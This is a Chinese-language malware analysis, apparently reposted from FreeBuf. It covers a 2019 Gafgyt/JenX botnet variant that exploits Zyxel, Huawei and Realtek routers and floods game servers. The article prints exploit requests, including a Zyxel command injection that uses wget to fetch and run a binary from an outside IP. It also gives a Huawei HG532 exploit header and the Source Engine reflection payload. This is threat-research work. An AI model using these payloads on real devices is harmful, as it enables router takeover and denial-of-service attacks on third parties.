在2019年9月,研究人員在對IoT威脅搜尋過程中發現了的Gafgyt變種。 特別是針對Zyxel,Huawei和Realtek等知名商業品牌的小型辦公室/家庭無線路由器。
這種Gafgyt變體和JenX殭屍網路互相競爭資源,該殭屍網路還使用遠端程式碼執行漏洞來獲取訪問許可權,並利用殭屍網路攻擊遊戲伺服器(尤其是那些執行Valve Source引擎的伺服器),導致其拒絕服務(DoS) 。
研究人員還發現這些殭屍網路經常會在Instagram上出售, 根據Shodan的掃描,全世界有超過32,000個WiFi路由器易受到攻擊。
CVE-2017-18368 – ZYXEL P660HN-T1A
CVE-2017-17215 – Huawei HG532
CVE-2014-8361 – Realtek RTL81XX Chipset
目標IOT裝置: Wi-Fi路由器
從2016年開始,無線路由器是跨行業組織中最常見的IoT裝置之一,使其成為IoT殭屍網路的目標。此外,殭屍網路使用漏洞利用而不是字典攻擊來訪問IoT裝置。即使管理員禁用了不安全的服務並增強了密碼強度,殭屍網路也會輕鬆地透過IoT裝置傳播。
Gafgyt是於2014年被發現的殭屍網路,併發起過大規模DDoS(分散式拒絕服務)攻擊。從那時起,許多殭屍網路變體不斷出現並針對不同行業中的不同型別的裝置。
殭屍網路與遊戲伺服器之間存在牢固的聯絡。Radware公開了一個類似的變種JenX,它濫用了CVE-2017-17215和CVE-2014-8361,它們分別存在於WiFi路由器:華為HG532和Realtek RTL81XX中。
研究團隊發現了JenX變體的Gafgyt惡意軟體的變種(SHA256:676813ee73d382c08765a75204be8bab6bea730ff0073de10765091a8decdf07),在分析了樣本之後,確定了它針對三種無線路由器模型(比原始JenX惡意軟體多一種):
Zyxel P660HN-T1A
Huawei HG532
Realtek RTL81XX
它使用三個“掃描程式”來嘗試利用上述路由器存在的已知遠端程式碼執行漏洞。 這些掃描器替代了其他物聯網殭屍網路中常見的字典攻擊。
儘管以前的Gafgyt變體一直在利用無線路由器上的漏洞,但此變體將三種特定利用組合到一個例項中:
CVE-2017-18368 – ZYXEL P660HN-T1A
CVE-2017-17215 – Huawei HG532
CVE-2014-8361 – Realtek RTL81XX Chipset
漏洞 #1: CVE-2017-18368 – ZYXEL P660HN-T1A
第一個漏洞利用Zyxel P660HN無線路由器上的遠端命令注入。
TrueOnline發行的Zyxel P660HN-T1A在遠端系統日誌轉發功能中具有命令注入漏洞,未經身份驗證的使用者可以訪問路由器。 該漏洞位於ViewLog。asp頁中,可以透過remote_host引數加以利用,如下所示。
POST /cgi-bin/ViewLog。asp HTTP/1。1Host: 127。0。0。1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: AnkitContent-Length: 176Content-Type: application/x-www-form-urlencodedremote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://185。172。110[。]224/arm7;chmod+777+arm7;。/arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
有效負載位於zyxelscanner_scanner_init函式:
漏洞 #2: CVE-2017-17215 – Huawei HG532
第二種利用方式利用在HG532路由器上發現的遠端執行程式碼漏洞。
攻擊者可以將惡意資料包傳送到TCP埠37215發起攻擊,成功利用可遠端執行任意程式碼。
POST /ctrlt/DeviceUpgrade_1 HTTP/1。1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username=“dslf-config”, realm=“HuaweiHomeGateway”,nonce=“88645cefb1f9ede0e336e3569d75ee30”, uri=“/ctrlt/DeviceUpgrade_1”, response=“3612f843a42db38f48f59d2a3597e19c”, algorithm=“MD5”, qop=“auth”, nc=00000001, cnonce=“248d1a2560100669”<?xml version=“1。0” ?>
在huaweiscanner_scanner_init函式中找到該漏洞利用程式:
漏洞 #3: CVE-2014-8361 – Realtek RTL81XX Chipset
此漏洞利用Realtek路由器在2014年發現的嚴重漏洞,該漏洞可遠端程式碼執行。
Realtek SDK中的miniigd SOAP服務允許遠端攻擊者透過定製的NewInternalClient請求執行任意程式碼,如下所示。
可以在realtekscanner_scanner_init函式找到payload:
傳播感染
此JenX變體使用前面提到的掃描功能來查詢要感染的機器。 然後,根據感染的裝置型別,使用wget下載ARM7或MIPS二進位制檔案。
一旦惡意軟體在受感染的裝置上執行,它就會連線到C2伺服器,併發送裝置資訊加入殭屍網路:
加入殭屍網路時受感染的裝置會將自身資訊傳送到C2伺服器,例如其IP地址和體系結構。 如果沒有引數傳遞,它將命名為“未知”。 然後,C2伺服器用PING命令答覆:
裝置加入殭屍網路後,它將開始接收執行各種型別的DoS攻擊的命令。
DoS攻擊
根據從C2伺服器接收的命令,Gafgyt變體可以同時執行不同型別的DoS攻擊。 以下是確定的一些重要攻擊選項:
HTTP
它呼叫SendHTTP函式來發起HTTP泛洪攻擊。
該函式接收六個引數來執行攻擊:http方法,目標主機,埠,檔案路徑,結束時間和迭代。它隨機使用程式中定義的使用者代理來執行攻擊。
HTTPHex
與HTTP相似,它呼叫SendHTTPHex函式。
此函式與SendHTTP函式相同的引數,但它不使用常規檔案路徑(如/index。html),而是使用十六進位制陣列來消耗伺服器上的更多資源。
HTTPCF
這是對Cloudflare保護的服務的攻擊。
KILLER&KILLATTK
此選項將殺死在當前受感染裝置中的競爭殭屍網路。
VSE
可攻擊執行Valve Source Engine的遊戲伺服器。
遊戲行業目標
如前所述,VSE命令對執行Valve Source引擎的遊戲伺服器發起攻擊。
該引擎可執行《半條命》和《軍團要塞2》等遊戲。這並不是對Valve公司本身的攻擊,因為任何人都可以在自己的網路上執行這些遊戲的伺服器。
以下是用於攻擊這些伺服器的有效負載:
TSource Engine Query + /x54/x53/x6f/x75/x72/x63/x65/x20/x45/x6e/x67/x69/x6e/x65/x20/x51/x75/x65/x72/x79 rfdknjms
payload被廣泛用於分散式反射拒絕服務(DrDoS),它涉及多個受害者機器,這些機器無意間參與了DDoS攻擊。
Source Engine查詢是使用Valve軟體協議在客戶端和遊戲伺服器之間進行日常通訊的一部分。 對受害者主機的請求將從受害者主機重定向到目標,會引發大量的攻擊流量,從而在目標主機上造成DoS。
利用其餘的DoS攻擊選項,攻擊者可以將目標鎖定在其他託管遊戲的伺服器上,例如Fortnite。
惡意軟體交易市場
此樣本中發現的攻擊之一是在同一裝置上尋找其他競爭性殭屍網路,並試圖殺死它們,因此這將是該裝置參與的唯一殭屍網路。它將查詢其他物聯網殭屍網路中存在的關鍵字和二進位制名稱。 它們分為兩組bin_names和bin_strings:
許多字串與其他IoT殭屍網路有關,例如Hakai,Miori,Satori和Mirai。其他一些字串與Instagram使用者名稱有關。
研究團隊聯絡過他們使用虛假的個人資料,發現他們都在自己的Instagram低價銷售殭屍網路。他們在伺服器上為買家提供“現貨”,價格從8美元到150美元不等,可以向他們付費新增一組IP地址,殭屍網路將針對這些IP地址發起DoS攻擊。他們還根據預算和需求以各種價格向提供殭屍網路的原始碼。
總結
攻擊者使用IoT裝置中的已知漏洞(其中一些漏洞已經存在5年以上)來獲取控制權,並使它們成為針對遊戲伺服器Dos大規模攻擊殭屍網路的一部分。
這些漏洞利用最新Gafgyt(源自JenX變體)和所有行業中廣泛使用無線路由器。
受IoT殭屍網路攻擊的主機比以前更廣泛,遊戲伺服器已成為主要的目標。
常見的惡意軟體市場多為暗網路和地下論壇,但現在,惡意軟體可以在社交網路上出售。惡意軟體樣本和DoS攻擊程式碼對任何人都很容易獲得,買家可以無需任何技術知識以幾美元的價格發起大規模攻擊。
文章轉載來源於 FreeBuf.COM
